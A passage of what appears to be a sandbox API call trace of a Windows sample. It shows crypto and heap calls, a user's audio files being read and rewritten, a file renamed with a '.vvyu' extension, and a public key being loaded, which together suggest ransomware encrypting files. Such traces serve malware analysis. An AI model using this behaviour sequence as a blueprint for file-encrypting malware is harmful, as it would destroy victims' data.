out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.755] GetLastError () returned 0x0 [0192.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.755] GetLastError () returned 0x0 [0192.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.756] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.756] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0192.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.756] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.756] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.756] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18de0) returned 0x2d45778 [0192.758] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41c38 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41c80 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.759] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dc0 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39da8 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.762] GetCurrentThreadId () returned 0x264 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45440 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.763] GetCurrentThreadId () returned 0x264 [0192.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dc0 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e20 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e38 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dd8 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39da8 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41c80 | out: hHeap=0x6a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.774] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x18dd0, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x18dd0, lpOverlapped=0x0) returned 1 [0192.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.776] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18dd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.776] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.777] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.778] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.778] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.778] CloseHandle (hObject=0x584) returned 1 [0192.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0192.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.780] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\32aCzuXFDU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\32aczuxfdu.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\32aCzuXFDU.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\32aczuxfdu.mp3.vvyu")) returned 1 [0192.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.782] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0192.785] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe4acc0, ftCreationTime.dwHighDateTime=0x1d89d34, ftLastAccessTime.dwLowDateTime=0x197f23a0, ftLastAccessTime.dwHighDateTime=0x1d8a222, ftLastWriteTime.dwLowDateTime=0x197f23a0, ftLastWriteTime.dwHighDateTime=0x1d8a222, nFileSizeHigh=0x0, nFileSizeLow=0x116ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n3veXEkNYxTCSfI4 ofL.m4a", cAlternateFileName="N3VEXE~1.M4A")) returned 1 [0192.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0192.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.785] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\n3veXEkNYxTCSfI4 ofL.m4a") returned=".m4a" [0192.785] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\n3veXEkNYxTCSfI4 ofL.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\n3vexeknyxtcsfi4 ofl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.789] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=71340) returned 1 [0192.789] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.793] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11686, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.793] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.796] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.796] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x116ac, lpOverlapped=0x0) returned 1 [0192.797] lstrlenA (lpString="-----BEGIN PUBLIC 